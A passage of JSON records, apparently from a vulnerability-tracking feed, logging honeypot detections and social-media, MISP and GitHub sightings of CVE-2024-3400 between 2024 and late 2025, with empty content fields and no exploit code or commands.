"vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-03)", "content": "", "creation_timestamp": "2025-11-03T00:00:00.000000Z"}, {"uuid": "2cce2d6a-33ab-40da-9721-eea6cb466462", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-09)", "content": "", "creation_timestamp": "2025-08-09T00:00:00.000000Z"}, {"uuid": "364156cb-0cff-4cef-b2d9-773d1e92bfa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-12)", "content": "", "creation_timestamp": "2025-08-12T00:00:00.000000Z"}, {"uuid": "859e0776-03bd-4474-bda4-3fabf69c46ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3lz3esfxfh22z", "content": "", "creation_timestamp": "2025-09-18T03:10:08.534524Z"}, {"uuid": "bf3de533-d07e-439c-8263-97d55bc4861d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-11)", "content": "", "creation_timestamp": "2025-08-11T00:00:00.000000Z"}, {"uuid": "d418bcd0-de8b-458e-80cc-a3cf050385b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-01)", "content": "", "creation_timestamp": "2025-11-01T00:00:00.000000Z"}, {"uuid": "ec711a99-559e-4ebf-a114-005f76c059a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-14)", "content": "", "creation_timestamp": "2025-09-14T00:00:00.000000Z"}, {"uuid": "6aba1513-4aa0-4ffd-9e0f-793d25f53b84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-07)", "content": "", "creation_timestamp": "2025-09-07T00:00:00.000000Z"}, {"uuid": "65e786e3-e530-4427-8530-613787501b50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-13)", "content": "", "creation_timestamp": "2025-08-13T00:00:00.000000Z"}, {"uuid": "c05a70da-445b-45b8-9b32-7740abd7b11e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/sansisc.bsky.social/post/3lzyoeiltfv2k", "content": "", "creation_timestamp": "2025-09-29T18:48:31.523567Z"}, {"uuid": "834f4b72-b252-48ad-8ca7-a5fe739469ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-16)", "content": "", "creation_timestamp": "2025-11-16T00:00:00.000000Z"}, {"uuid": "7063cffa-7c8b-4af4-a8d4-38d7903a6164", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-14)", "content": "", "creation_timestamp": "2025-08-14T00:00:00.000000Z"}, {"uuid": "1f194b7a-bae2-4d8a-83a6-d734c83219a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-03)", "content": "", "creation_timestamp": "2025-10-03T00:00:00.000000Z"}, {"uuid": "219f8659-11c3-43ee-a1b9-1b5596155b06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-11)", "content": "", "creation_timestamp": "2025-11-11T00:00:00.000000Z"}, {"uuid": "63b1b85e-70d2-446b-88b0-15685b738e08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-03)", "content": "", "creation_timestamp": "2025-10-03T00:00:00.000000Z"}, {"uuid": "9c8366ce-39dd-42dc-8fb3-5098f32b96e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-12)", "content": "", "creation_timestamp": "2025-11-12T00:00:00.000000Z"}, {"uuid": "7f44938f-e38b-4c3b-81b3-85bf9d0a33f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/hunterstrategy.bsky.social/post/3lyuyjq2j2t2h", "content": "", "creation_timestamp": "2025-09-15T14:14:34.134400Z"}, {"uuid": "22492e86-3a2c-4b52-af91-052b0cf3ec64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-14)", "content": "", "creation_timestamp": "2025-08-14T00:00:00.000000Z"}, {"uuid": "cddd2a3e-51f5-4e33-8b8a-799379f433fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-3400", "type": "seen", "source": "https://gist.github.com/Darkcrai86/94b2e5a50773a0bd1c3514f9b3ce0883", "content": "", "creation_timestamp": "2025-10-04T18:05:04.000000Z"}, {"uuid": "0090f38e-81a1-4b87-98e2-3e84f148753a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-15)", "content": "", "creation_timestamp": "2025-08-15T00:00:00.000000Z"}, {"uuid": "9f7181af-3095-4448-8811-5219eb6c2d67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-26)", "content": "", "creation_timestamp": "2025-10-26T00:00:00.000000Z"}, {"uuid": "8f3415f5-1200-4900-bbea-fafc3457705c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://gist.github.com/Darkcrai86/6e7631b7698866b0940cf7b91525a794", "content": "", "creation_timestamp": "2025-10-04T15:50:13.000000Z"}, {"uuid": "a1df2487-7ff9-476f-a05e-b669668b6452", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-13)", "content": "", "creation_timestamp": "2025-11-13T00:00:00.000000Z"}, {"uuid": "67ea83b2-a43f-452e-b19a-85dc9dae6036", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-10)", "content": "", "creation_timestamp": "2025-09-10T00:00:00.000000Z"}, {"uuid": "1073e461-4377-4acd-9a4c-73010fc9434d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-16)", "content": "", "creation_timestamp": "2025-08-16T00:00:00.000000Z"}, {"uuid": "76f72e35-5105-420d-a2cc-703d1c601785", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-09)", "content": "", "creation_timestamp": "2025-10-09T00:00:00.000000Z"}, {"uuid": "3c780279-4658-47f0-918e-fcc960c67585", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-17)", "content": "", "creation_timestamp": "2025-08-17T00:00:00.000000Z"}, {"uuid": "c11d7f8f-6294-4302-a5be-96d38de478ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-16)", "content": "", "creation_timestamp": "2025-10-16T00:00:00.000000Z"}, {"uuid": "e2ee9b40-043a-462c-9a5e-f9c4728d0041", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-11)", "content": "", "creation_timestamp": "2025-10-11T00:00:00.000000Z"}, {"uuid": "1efd529b-dd19-47d2-a220-e6b3decd3672", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-20)", "content": "", "creation_timestamp": "2025-10-20T00:00:00.000000Z"}, {"uuid": "d95a5c2a-2da1-41b5-8410-b2ad39bc38d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-28)", "content": "", "creation_timestamp": "2025-10-28T00:00:00.000000Z"}, {"uuid": "15a00898-4442-458c-8204-360fa5e8f4ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-02)", "content": "", "creation_timestamp": "2025-11-02T00:00:00.000000Z"}, {"uuid": "b4374cc7-b7fa-4b84-9b22-85ba1e1fdf64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-30)", "content": "", "creation_timestamp": "2025-10-30T00:00:00.000000Z"}, {"uuid": "4b4c9318-5790-411b-bfff-284aec293284", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/hunterstrategy.bsky.social/post/3lx36skhooq2e", "content": "", "creation_timestamp": "2025-08-23T14:32:27.642132Z"}, {"uuid": "b39a8235-de7f-4418-9c3c-a439ddff460a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://mastodon.social/users/leakix/statuses/115575305122769519", "content": "", "creation_timestamp": "2025-11-19T08:00:05.233194Z"}, {"uuid": "b146883c-0ff2-4bf5-acd2-0e37bb8190c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/leakix.bsky.social/post/3m5xrvul5mf2q", "content": "", "creation_timestamp": "2025-11-19T08:00:06.456574Z"}, {"uuid": "72a89c82-4d72-4bdc-a7c5-54d3dac2d933", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-08)", "content": "", "creation_timestamp": "2025-09-08T00:00:00.000000Z"}, {"uuid": "fe76ea8d-397a-4de7-8720-2f910a8381f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/hrbrmstr.mastodon.social.ap.brid.gy/post/3m5jnfb2cywi2", "content": "", "creation_timestamp": "2025-11-13T17:02:39.554613Z"}, {"uuid": "af483169-70c3-487f-9cc3-66d46e8f20f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-10)", "content": "", "creation_timestamp": "2025-10-10T00:00:00.000000Z"}, {"uuid": "14a66351-5ff0-48e7-b706-d646911ad930", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3m22so4hsck2w", "content": "", "creation_timestamp": "2025-09-30T15:11:03.479828Z"}, {"uuid": "20af2522-4ab9-4505-bb7e-77f646f71033", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-05)", "content": "", "creation_timestamp": "2025-11-05T00:00:00.000000Z"}, {"uuid": "ba9e1937-e218-41a4-baec-e00111866d39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-23)", "content": "", "creation_timestamp": "2025-08-23T00:00:00.000000Z"}, {"uuid": "d2bef24f-fa9f-4bab-a519-d41b7a6c2705", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-18)", "content": "", "creation_timestamp": "2025-11-18T00:00:00.000000Z"}, {"uuid": "ddc3bec4-0219-4bfa-a9c0-486b420589db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3m22vnyj72s2a", "content": "", "creation_timestamp": "2025-09-30T16:04:26.109891Z"}, {"uuid": "573ec33c-3397-4987-a479-d759821633b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/94901317-a31d-44b5-a66c-8fe3dbace6b5", "content": "", "creation_timestamp": "2025-09-12T00:16:19.000000Z"}, {"uuid": "4a7d40d3-848b-4d8d-a8b3-f1c29f6512d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-12)", "content": "", "creation_timestamp": "2025-10-12T00:00:00.000000Z"}, {"uuid": "1f0bc3b1-49a5-411a-b018-4c7fb62452df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23retpez22b", "content": "", "creation_timestamp": "2025-10-01T00:20:27.866844Z"}, {"uuid": "cd10729f-6baa-4dbd-a5f6-cdefe06455c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23rjoqhvc2b", "content": "", "creation_timestamp": "2025-10-01T00:23:15.267087Z"}, {"uuid": "2115d8b8-8d5a-444b-a8d5-3b704a6defc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://mastodon.social/users/hrbrmstr/statuses/115543458712266887", "content": "", "creation_timestamp": "2025-11-13T17:01:08.450415Z"}, {"uuid": "bba1ffb1-c125-4e62-9b4e-130d64f65e08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23rjrhf5c2b", "content": "", "creation_timestamp": "2025-10-01T00:23:15.779500Z"}, {"uuid": "c38e9872-6e9b-4930-8304-94b608b4c48f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23rjt6dwk2b", "content": "", "creation_timestamp": "2025-10-01T00:23:16.275092Z"}, {"uuid": "f17f00b0-adf8-4fa9-8eec-03d3be4220fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23rb7j7ks2b", "content": "", "creation_timestamp": "2025-10-01T00:18:25.043796Z"}, {"uuid": "9f85d55f-ac2c-4b65-bf99-37feb15bf3bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23rteg6ak2b", "content": "", "creation_timestamp": "2025-10-01T00:28:43.541100Z"}, {"uuid": "13dc59d1-b140-43be-b8c5-89914a18b95c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23rterrdk2b", "content": "", "creation_timestamp": "2025-10-01T00:28:46.656247Z"}, {"uuid": "bd9cc0aa-1030-4ecb-b87b-de0d4676b04c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23rtir5j22b", "content": "", "creation_timestamp": "2025-10-01T00:28:49.791767Z"}, {"uuid": "4a64f153-995d-4022-9165-4019342aa404", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23rtmasqs2b", "content": "", "creation_timestamp": "2025-10-01T00:28:52.940742Z"}, {"uuid": "3394cc2b-65a1-4567-b201-5d85cc6c84c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-15)", "content": "", "creation_timestamp": "2025-09-15T00:00:00.000000Z"}, {"uuid": "b0a039f6-a9bd-4851-84f7-e36640e2967f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23rtmaupc2b", "content": "", "creation_timestamp": "2025-10-01T00:28:56.013906Z"}, {"uuid": "55105f1c-6834-46b6-9f9c-1ba56ca2ef62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m23rtmaxn22b", "content": "", "creation_timestamp": "2025-10-01T00:28:59.087839Z"}, {"uuid": "8f00ef62-5e41-4d20-9bff-94760cfe2538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-17)", "content": "", "creation_timestamp": "2025-10-17T00:00:00.000000Z"}, {"uuid": "0e527495-332f-4f0a-842e-da9927b7dc15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:11.000000Z"}, {"uuid": "ba9ef0a2-8034-41a0-82db-e83c22d97ca5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-12)", "content": "", "creation_timestamp": "2025-10-12T00:00:00.000000Z"}, {"uuid": "e356bb21-fbc8-47d5-bae1-272d3e8daaa3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115576903046164559", "content": "", "creation_timestamp": "2025-11-19T14:46:24.642130Z"}, {"uuid": "26d8e368-ed38-450d-aa8d-4b9e156675bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-27)", "content": "", "creation_timestamp": "2025-08-27T00:00:00.000000Z"}, {"uuid": "da95e8d3-d50a-49fe-8189-5847a96054e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-0cc0a2cc-984ab59dd0761b42", "content": "", "creation_timestamp": "2025-08-29T07:38:09.389493Z"}, {"uuid": "fa57570b-9712-4445-835b-a27c8644680a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/3057b723-5fae-476d-b162-b0a1a9a63ac2", "content": "", "creation_timestamp": "2025-08-28T15:41:49.000000Z"}, {"uuid": "a58830eb-09ed-4674-a679-c08c275fa53a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/3057b723-5fae-476d-b162-b0a1a9a63ac2", "content": "", "creation_timestamp": "2025-09-01T03:42:37.000000Z"}, {"uuid": "7a46f100-cca8-4f10-9b48-9ba8958e16f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://threatintel.cc/2025/08/30/cisa-aaa-global-advisory-on.html", "content": "", "creation_timestamp": "2025-08-30T21:15:53.000000Z"}, {"uuid": "b08a5fd8-1366-4e17-acd8-f529e7d312c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-11)", "content": "", "creation_timestamp": "2025-09-11T00:00:00.000000Z"}, {"uuid": "9b62c4a8-ba6f-4a2e-a3c1-58c3c3262f62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-30)", "content": "", "creation_timestamp": "2025-09-30T00:00:00.000000Z"}, {"uuid": "7a022286-2d7f-4296-900a-d5b376b37a60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/panos_telemetry_cmd_exec.rb", "content": "", "creation_timestamp": "2024-04-19T18:10:30.000000Z"}, {"uuid": "8dde031f-66ea-4f0d-94d0-6b5d99562a05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-31)", "content": "", "creation_timestamp": "2025-08-31T00:00:00.000000Z"}, {"uuid": "8e70ac55-1353-4be6-954f-8bf084521401", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-14)", "content": "", "creation_timestamp": "2025-11-14T00:00:00.000000Z"}, {"uuid": "d7ebe261-c848-4a17-8e71-b1a8ea2c081d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m26hx2pnkj2k", "content": "", "creation_timestamp": "2025-10-02T02:09:36.906087Z"}, 